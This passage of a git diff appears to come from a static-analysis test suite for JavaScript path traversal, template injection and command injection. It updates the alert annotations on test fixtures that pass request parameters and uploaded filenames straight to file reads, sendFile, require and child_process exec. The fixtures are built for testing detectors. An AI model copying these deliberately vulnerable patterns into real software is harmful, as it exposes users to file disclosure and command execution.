fs.readFileSync(path); } if (!path.matchAll(/\.\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\.\//)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\.\/foo/)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (!path.matchAll(/(\.\.\/|\.\.\\)/)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js index 1dac13246c6f..8d2bfe11feb7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js @@ -8,20 +8,20 @@ var http = require("http"), var server = http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK - gracefulFs.readFileSync(path); // NOT OK - fsExtra.readFileSync(path); // NOT OK - originalFs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert + gracefulFs.readFileSync(path); // $ Alert + fsExtra.readFileSync(path); // $ Alert + originalFs.readFileSync(path); // $ Alert - getFsModule(true).readFileSync(path); // NOT OK - getFsModule(false).readFileSync(path); // NOT OK + getFsModule(true).readFileSync(path); // $ Alert + getFsModule(false).readFileSync(path); // $ Alert - require("./my-fs-module").require(true).readFileSync(path); // NOT OK + require("./my-fs-module").require(true).readFileSync(path); // $ Alert let flexibleModuleName = require(process.versions["electron"] ? "original-fs" : "fs"); - flexibleModuleName.readFileSync(path); // NOT OK + flexibleModuleName.readFileSync(path); // $ Alert }); function getFsModule(special) { @@ -37,9 +37,9 @@ var util = require("util"); http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - util.promisify(fs.readFileSync)(path); // NOT OK - require("bluebird").promisify(fs.readFileSync)(path); // NOT OK - require("bluebird").promisifyAll(fs).readFileSync(path); // NOT OK + util.promisify(fs.readFileSync)(path); // $ Alert + require("bluebird").promisify(fs.readFileSync)(path); // $ Alert + require("bluebird").promisifyAll(fs).readFileSync(path); // $ Alert }); @@ -48,37 +48,37 @@ const asyncFS = require("./my-async-fs-module"); http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK - asyncFS.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert + asyncFS.readFileSync(path); // $ Alert - require("pify")(fs.readFileSync)(path); // NOT OK - require("pify")(fs).readFileSync(path); // NOT OK + require("pify")(fs.readFileSync)(path); // $ Alert + require("pify")(fs).readFileSync(path); // $ Alert - require('util.promisify')(fs.readFileSync)(path); // NOT OK + require('util.promisify')(fs.readFileSync)(path); // $ Alert - require("thenify")(fs.readFileSync)(path); // NOT OK + require("thenify")(fs.readFileSync)(path); // $ Alert const readPkg = require('read-pkg'); - var pkg = readPkg.readPackageSync({cwd: path}); // NOT OK - var pkgPromise = readPkg.readPackageAsync({cwd: path}); // NOT OK + var pkg = readPkg.readPackageSync({cwd: path}); // $ Alert + var pkgPromise = readPkg.readPackageAsync({cwd: path}); // $ Alert }); const mkdirp = require("mkdirp"); http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK - mkdirp(path); // NOT OK - mkdirp.sync(path); // NOT OK + fs.readFileSync(path); // $ Alert + mkdirp(path); // $ Alert + mkdirp.sync(path); // $ Alert func(path); }); function func(x) { - fs.readFileSync(x); // NOT OK + fs.readFileSync(x); // $ Alert } const fsp = require("fs/promises"); http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - fsp.readFile(path); // NOT OK + fsp.readFile(path); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js index 7546bb2c2938..d3ee99d4974b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js @@ -4,11 +4,11 @@ const prettier = require("prettier"); const app = express(); app.get('/some/path', function (req, res) { const { p } = req.params; - prettier.resolveConfig(p).then((options) => { // NOT OK + prettier.resolveConfig(p).then((options) => { // $ Alert const formatted = prettier.format("foo", options); }); - prettier.resolveConfig("foo", {config: p}).then((options) => { // NOT OK + prettier.resolveConfig("foo", {config: p}).then((options) => { // $ Alert const formatted = prettier.format("bar", options); }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js index eebc95348ba6..fa19da302606 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js @@ -19,7 +19,7 @@ function getfileRoot(workspaceId) { } function withStatsAndETag(filepath, callback) { - fs.readFileSync(filepath); // NOT OK + fs.readFileSync(filepath); // $ Alert }; function decodeUserIdFromWorkspaceId(workspaceId) { diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js index 465b5b70b690..aaa6cfdc2407 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js @@ -5,30 +5,30 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var obj = bla ? something() : path; - fs.readFileSync(obj.sub); // NOT OK + fs.readFileSync(obj.sub); // $ Alert obj.sub = "safe"; - fs.readFileSync(obj.sub); // OK + fs.readFileSync(obj.sub); obj.sub2 = "safe"; if (random()) { - fs.readFileSync(obj.sub2); // OK + fs.readFileSync(obj.sub2); } if (random()) { obj.sub3 = "safe" } - fs.readFileSync(obj.sub3); // NOT OK + fs.readFileSync(obj.sub3); // $ Alert obj.sub4 = - fs.readFileSync(obj.sub4) ? // NOT OK - fs.readFileSync(obj.sub4) : // NOT OK - fs.readFileSync(obj.sub4); // NOT OK + fs.readFileSync(obj.sub4) ? // $ Alert + fs.readFileSync(obj.sub4) : // $ Alert + fs.readFileSync(obj.sub4); // $ Alert }); server.listen(); @@ -37,7 +37,7 @@ var nodefs = require('node:fs'); var server2 = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - nodefs.readFileSync(path); // NOT OK + nodefs.readFileSync(path); // $ Alert }); server2.listen(); @@ -46,5 +46,5 @@ const chownr = require("chownr"); var server3 = http.createServer(function (req, res) { let path = url.parse(req.url, true).query.path; - chownr(path, "someuid", "somegid", function (err) {}); // NOT OK + chownr(path, "someuid", "somegid", function (err) {}); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js index 061dec18a908..b37ebc2926ad 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js @@ -7,11 +7,11 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - res.write(fs.readFileSync(['public', path].join('/'))); // BAD - but not flagged because we have no array-steps [INCONSISTENCY] + res.write(fs.readFileSync(['public', path].join('/'))); // $ MISSING: Alert - not flagged because we have no array-steps let parts = ['public', path]; parts = parts.map(x => x.toLowerCase()); - res.write(fs.readFileSync(parts.join('/'))); // BAD - but not flagged because we have no array-steps [INCONSISTENCY] + res.write(fs.readFileSync(parts.join('/'))); // $ MISSING: Alert - not flagged because we have no array-steps }); server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js index 49c5fa78fe8d..e18e3c7e8bb1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js @@ -8,8 +8,8 @@ var server = http.createServer(function(req, res) { }); async function doRead(pathPromise) { - fs.readFileSync(await pathPromise); // NOT OK - pathPromise.then(path => fs.readFileSync(path)); // NO TOK + fs.readFileSync(await pathPromise); // $ Alert + pathPromise.then(path => fs.readFileSync(path)); // $ Alert } server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js index 23f89c55c39f..d9c07feb26b6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js @@ -3,15 +3,14 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - // BAD: loading a module based on un-sanitized query parameters - var m = require(req.param("module")); + var m = require(req.param("module")); // $ Alert - loading a module based on un-sanitized query parameters }); const resolve = require("resolve"); app.get('/some/path', function(req, res) { - var module = resolve.sync(req.param("module")); // NOT OK - resolving module based on query parameters + var module = resolve.sync(req.param("module")); // $ Alert - resolving module based on query parameters - resolve(req.param("module"), { basedir: __dirname }, function(err, res) { // NOT OK - resolving module based on query parameters + resolve(req.param("module"), { basedir: __dirname }, function(err, res) { // $ Alert - resolving module based on query parameters var module = res; }); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js index f4f289895a86..9a200f2a4c99 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js @@ -4,25 +4,22 @@ let path = require('path'); var app = express(); app.get('/some/path/:x', function(req, res) { - // BAD: sending a file based on un-sanitized query parameters - res.sendFile(req.param("gimme")); - // BAD: same as above - res.sendfile(req.param("gimme")); + res.sendFile(req.param("gimme")); // $ Alert - sending a file based on un-sanitized query parameters + res.sendfile(req.param("gimme")); // $ Alert - same as above - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.sendFile(req.param("gimme"), { root: process.cwd() }); - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.sendfile(req.param("gimme"), { root: process.cwd() }); - // BAD: doesn't help if user controls root - res.sendFile(req.param("file"), { root: req.param("dir") }); + res.sendFile(req.param("file"), { root: req.param("dir") }); // $ Alert - doesn't help if user controls root let homeDir = path.resolve('.'); - res.sendFile(homeDir + '/data/' + req.params.x); // OK: sendFile disallows ../ - res.sendfile('data/' + req.params.x); // OK: sendfile disallows ../ + res.sendFile(homeDir + '/data/' + req.params.x); // OK - sendFile disallows ../ + res.sendfile('data/' + req.params.x); // OK - sendfile disallows ../ - res.sendFile(path.resolve('data', req.params.x)); // NOT OK - res.sendfile(path.join('data', req.params.x)); // NOT OK + res.sendFile(path.resolve('data', req.params.x)); // $ Alert + res.sendfile(path.join('data', req.params.x)); // $ Alert res.sendFile(homeDir + path.join('data', req.params.x)); // kinda OK - can only escape from 'data/' diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js index 1b1e87b9a76a..d705be16b317 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js @@ -4,28 +4,28 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - fs.readFileSync(path.substring(i, j)); // OK - fs.readFileSync(path.substring(4)); // NOT OK - fs.readFileSync(path.substring(0, i)); // NOT OK - fs.readFileSync(path.substr(4)); // NOT OK - fs.readFileSync(path.slice(4)); // NOT OK + fs.readFileSync(path.substring(i, j)); + fs.readFileSync(path.substring(4)); // $ Alert + fs.readFileSync(path.substring(0, i)); // $ Alert + fs.readFileSync(path.substr(4)); // $ Alert + fs.readFileSync(path.slice(4)); // $ Alert - fs.readFileSync(path.concat(unknown)); // NOT OK - fs.readFileSync(unknown.concat(path)); // NOT OK - fs.readFileSync(unknown.concat(unknown, path)); // NOT OK + fs.readFileSync(path.concat(unknown)); // $ Alert + fs.readFileSync(unknown.concat(path)); // $ Alert + fs.readFileSync(unknown.concat(unknown, path)); // $ Alert - fs.readFileSync(path.trim()); // NOT OK - fs.readFileSync(path.toLowerCase()); // NOT OK + fs.readFileSync(path.trim()); // $ Alert + fs.readFileSync(path.toLowerCase()); // $ Alert - fs.readFileSync(path.split('/')); // OK (readFile throws an exception when the filename is an array) - fs.readFileSync(path.split('/')[0]); // OK -- for now - fs.readFileSync(path.split('/')[i]); // NOT OK - fs.readFileSync(path.split(/\//)[i]); // NOT OK - fs.readFileSync(path.split("?")[0]); // NOT OK - fs.readFileSync(path.split(unknown)[i]); // NOT OK -- but not yet flagged [INCONSISTENCY] - fs.readFileSync(path.split(unknown).whatever); // OK -- but still flagged [INCONSISTENCY] - fs.readFileSync(path.split(unknown)); // NOT OK - fs.readFileSync(path.split("?")[i]); // NOT OK -- but not yet flagged [INCONSISTENCY] + fs.readFileSync(path.split('/')); // OK - readFile throws an exception when the filename is an array + fs.readFileSync(path.split('/')[0]); // OK - for now + fs.readFileSync(path.split('/')[i]); // $ Alert + fs.readFileSync(path.split(/\//)[i]); // $ Alert + fs.readFileSync(path.split("?")[0]); // $ Alert + fs.readFileSync(path.split(unknown)[i]); // $ MISSING: Alert + fs.readFileSync(path.split(unknown).whatever); // $ SPURIOUS: Alert + fs.readFileSync(path.split(unknown)); // $ Alert + fs.readFileSync(path.split("?")[i]); // $ MISSING: Alert }); server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js index 1e95cf84ec76..097bcc1fa117 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js @@ -4,5 +4,5 @@ const parseTorrent = require('parse-torrent'), function getTorrentData(dir, torrent){ let name = parseTorrent(torrent).name, loc = dir + "/" + name + ".torrent.data"; - return fs.readFileSync(loc); // NOT OK + return fs.readFileSync(loc); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts index f5fd62b2ee00..51549ea75658 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts @@ -8,27 +8,26 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - // BAD: This could read any file on the file system - res.write(fs.readFileSync(path)); + res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system if (path === 'foo.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list let path2 = path; - path2 ||= res.write(fs.readFileSync(path2)); // GOOD: path is falsy + path2 ||= res.write(fs.readFileSync(path2)); // OK - path is falsy let path3 = path; - path3 &&= res.write(fs.readFileSync(path3)); // BAD: path is truthy + path3 &&= res.write(fs.readFileSync(path3)); // $ Alert - path is truthy let path4 = path; - path4 ??= res.write(fs.readFileSync(path4)); // GOOD - path is null or undefined - but we don't capture that. [INCONSISTENCY] + path4 ??= res.write(fs.readFileSync(path4)); // $ SPURIOUS: Alert - path is null or undefined - but we don't capture that. let path5 = path; path5 &&= "clean"; - res.write(fs.readFileSync(path5)); // GOOD: path is either falsy or "clean"; + res.write(fs.readFileSync(path5)); // OK - path is either falsy or "clean"; let path6 = path; path6 ||= "clean"; - res.write(fs.readFileSync(path6)); // BAD: path can still be tainted + res.write(fs.readFileSync(path6)); // $ Alert - path can still be tainted }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js index 0146533c6dca..bf14b568196b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js @@ -50,6 +50,6 @@ function doZipSlip() { files.push(name); } for (const file of files) { - fs.createWriteStream(path.join(extractTo, file)); // OK + fs.createWriteStream(path.join(extractTo, file)); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js index 07918647e6f0..45e4ced8380b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js @@ -26,7 +26,7 @@ fs.createReadStream('archive.zip') } if (!fileName.startsWith(".")) { - entry.pipe(fs.createWriteStream(fileName)); // OK. + entry.pipe(fs.createWriteStream(fileName)); } }); @@ -35,5 +35,5 @@ fs.createReadStream('archive.zip') .on('entry', entry => { const fileName = path.normalize(entry.path); - entry.pipe(fs.createWriteStream(path.basename(fileName))); // OK. + entry.pipe(fs.createWriteStream(path.basename(fileName))); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/routes.js b/javascript/ql/test/query-tests/Security/CWE-073/routes.js index 2bfbad7cd37b..07e03fc0f404 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/routes.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/routes.js @@ -1,3 +1,3 @@ exports.foo = function(req, res) { - res.render('foo', req.body); // NOT OK + res.render('foo', req.body); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst.js b/javascript/ql/test/query-tests/Security/CWE-073/tst.js index ee2bff5f0e78..8b6c30c46947 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst.js @@ -7,26 +7,26 @@ app.post('/path', function(req, res) { var bodyParameter = req.body.bodyParameter; var queryParameter = req.query.queryParameter; - res.render('template', bodyParameter); // NOT OK - res.render('template', queryParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert + res.render('template', queryParameter); // $ Alert if (typeof bodyParameter === "string") { - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); } - res.render('template', queryParameter + ""); // OK + res.render('template', queryParameter + ""); - res.render('template', {profile: bodyParameter}); // OK + res.render('template', {profile: bodyParameter}); indirect(res, queryParameter); }); function indirect(res, obj) { - res.render("template", obj); // NOT OK + res.render("template", obj); // $ Alert const str = obj + ""; - res.render("template", str); // OK + res.render("template", str); - res.render("template", JSON.parse(str)); // NOT OK + res.render("template", JSON.parse(str)); // $ Alert } let routes = require('./routes'); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js index 6cb626fd7c1c..8f8b075010bf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js @@ -4,27 +4,27 @@ app.engine( '.hbs', handlebars({ defaultLayout: 'main', extname: '.hbs' }) ); app.set('view engine', '.hbs') app.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); var app2 = require('express')(); app2.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); }); var app3 = require('express')(); app3.set('view engine', 'pug'); app3.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); }); var app4 = require('express')(); app4.set('view engine', 'ejs'); app4.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); var app5 = require('express')(); @@ -32,7 +32,7 @@ app5.engine("foobar", require("consolidate").whiskers); app5.set('view engine', 'foobar'); app5.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); var app6 = require('express')(); @@ -40,7 +40,7 @@ app6.register(".html", require("consolidate").whiskers); app6.set('view engine', 'html'); app6.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); const express = require('express'); @@ -49,6 +49,6 @@ var app7 = express(); app7.set('view engine', 'ejs'); router.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); app7.use("/router", router); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js index 1cfea0118bc2..3f50d6d5df66 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js @@ -6,7 +6,7 @@ const { exec } = require('child_process'); function echo_title() { // get the title from the event pull request const title = github.context.payload.pull_request.title; - exec(`echo ${title}`, (err, stdout, stderr) => { // NOT OK + exec(`echo ${title}`, (err, stdout, stderr) => { // $ Alert if (err) { return; } @@ -16,7 +16,7 @@ function echo_title() { // function which passes the issue title into an exec function exec_head_ref() { const head_ref = github.context.payload.pull_request.head.ref; - aexec.exec(`echo ${head_ref}`).then((res) => { // NOT OK + aexec.exec(`echo ${head_ref}`).then((res) => { // $ Alert console.log(res); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js index abc9704a48e8..ddfa7b720d02 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js @@ -5,61 +5,61 @@ var cp = require("child_process"), var server = http.createServer(function(req, res) { let cmd = url.parse(req.url, true).query.path; - cp.exec("foo"); // OK - cp.execSync("foo"); // OK - cp.execFile("foo"); // OK - cp.execFileSync("foo"); // OK - cp.spawn("foo"); // OK - cp.spawnSync("foo"); // OK - cp.fork("foo"); // OK + cp.exec("foo"); + cp.execSync("foo"); + cp.execFile("foo"); + cp.execFileSync("foo"); + cp.spawn("foo"); + cp.spawnSync("foo"); + cp.fork("foo"); - cp.exec(cmd); // NOT OK - cp.execSync(cmd); // NOT OK - cp.execFile(cmd); // NOT OK - cp.execFileSync(cmd); // NOT OK - cp.spawn(cmd); // NOT OK - cp.spawnSync(cmd); // NOT OK - cp.fork(cmd); // NOT OK + cp.exec(cmd); // $ Alert + cp.execSync(cmd); // $ Alert + cp.execFile(cmd); // $ Alert + cp.execFileSync(cmd); // $ Alert + cp.spawn(cmd); // $ Alert + cp.spawnSync(cmd); // $ Alert + cp.fork(cmd); // $ Alert - cp.exec("foo" + cmd + "bar"); // NOT OK + cp.exec("foo" + cmd + "bar"); // $ Alert // These are technically NOT OK, but they are more likely as false positives - cp.exec("foo", {shell: cmd}); // OK - cp.exec("foo", {env: {PATH: cmd}}); // OK - cp.exec("foo", {cwd: cmd}); // OK - cp.exec("foo", {uid: cmd}); // OK - cp.exec("foo", {gid: cmd}); // OK + cp.exec("foo", {shell: cmd}); + cp.exec("foo", {env: {PATH: cmd}}); + cp.exec("foo", {cwd: cmd}); + cp.exec("foo", {uid: cmd}); + cp.exec("foo", {gid: cmd}); let sh, flag; if (process.platform == 'win32') sh = 'cmd.exe', flag = '/c'; else sh = '/bin/sh', flag = '-c'; - cp.spawn(sh, [ flag, cmd ]); // NOT OK + cp.spawn(sh, [ flag, cmd ]); // $ Alert let args = []; args[0] = "-c"; - args[1] = cmd; // NOT OK + args[1] = cmd; // $ Alert cp.execFile("/bin/bash", args); let args = []; args[0] = "-c"; - args[1] = cmd; // NOT OK + args[1] = cmd; // $ Alert run("sh", args); let args = []; args[0] = `-` + "c"; - args[1] = cmd; // NOT OK + args[1] = cmd; // $ Alert cp.execFile(`/bin` + "/bash", args); - cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // NOT OK - cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // NOT OK + cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert + cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert let myArgs = []; myArgs.push(`-` + "c"); myArgs.push(cmd); - cp.execFile(`/bin` + "/bash", args); // NOT OK - but no support for `[].push()` for indirect arguments [INCONSISTENCY] + cp.execFile(`/bin` + "/bash", args); // $ MISSING: Alert - no support for `[].push()` for indirect arguments }); @@ -72,7 +72,7 @@ var util = require("util") http.createServer(function(req, res) { let cmd = url.parse(req.url, true).query.path; - util.promisify(cp.exec)(cmd); // NOT OK + util.promisify(cp.exec)(cmd); // $ Alert }); @@ -80,7 +80,7 @@ const webpackDevServer = require('webpack-dev-server'); new webpackDevServer(compiler, { before: function (app) { app.use(function (req, res, next) { - cp.exec(req.query.fileName); // NOT OK + cp.exec(req.query.fileName); // $ Alert require("my-sub-lib").foo(req.query.fileName); // calls lib/subLib/index.js#foo }); @@ -91,5 +91,5 @@ import Router from "koa-router"; const router = new Router(); router.get("/ping/:host", async (ctx) => { - cp.exec("ping " + ctx.params.host); // NOT OK + cp.exec("ping " + ctx.params.host); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js index b5b8fc602bdf..b2cfe4424039 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js @@ -12,7 +12,7 @@ function getShell() { function execSh(command, options) { var shell = getShell() - return cp.spawn(shell.cmd, [shell.arg, command], options) // BAD + return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert } http.createServer(function (req, res) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js index ad91b66f5344..9d12f22bb249 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js @@ -7,7 +7,7 @@ function getShell() { } function execSh(command, options) { - return cp.spawn(getShell(), ["-c", command], options) // BAD + return cp.spawn(getShell(), ["-c", command], options) // $ Alert }; http.createServer(function (req, res) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js index 25e45d675d9f..1cfc40856113 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js @@ -11,7 +11,7 @@ function asyncEach(arr, iterator) { } function execEach(commands) { - asyncEach(commands, (command) => exec(command)); // NOT OK + asyncEach(commands, (command) => exec(command)); // $ Alert }; require('http').createServer(function(req, res) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js index 4b1dabde4412..0efc3279cf50 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js @@ -6,12 +6,12 @@ var app = express(); var exec = require("child_process").exec; app.post('/profile', upload.single('avatar'), function (req, res, next) { - exec("touch " + req.file.originalname); // NOT OK + exec("touch " + req.file.originalname); // $ Alert }); app.post('/photos/upload', upload.array('photos', 12), function (req, res, next) { req.files.forEach(file => { - exec("touch " + file.originalname); // NOT OK + exec("touch " + file.originalname); // $ Alert }) }); @@ -22,7 +22,7 @@ var Busboy = require('busboy'); http.createServer(function (req, res) { var busboy = new Busboy({ headers: req.headers }); busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { - exec("touch " + filename); // NOT OK + exec("touch " + filename); // $ Alert }); req.pipe(busboy); }).listen(8000); @@ -33,12 +33,12 @@ app.post('/api/upload', (req, res, next) => { let form = formidable({ multiples: true }); form.parse(req, (err, fields, files) => { - exec("touch " + fields.name); // NOT OK + exec("touch " + fields.name); // $ Alert }); let form2 = new formidable.IncomingForm(); form2.parse(req, (err, fields, files) => { - exec("touch " + fields.name); // NOT OK + exec("touch " + fields.name); // $ Alert }); }); @@ -50,13 +50,13 @@ http.createServer(function (req, res) { var form = new multiparty.Form(); form.parse(req, function (err, fields, files) { - exec("touch " + fields.name); // NOT OK + exec("touch " + fields.name); // $ 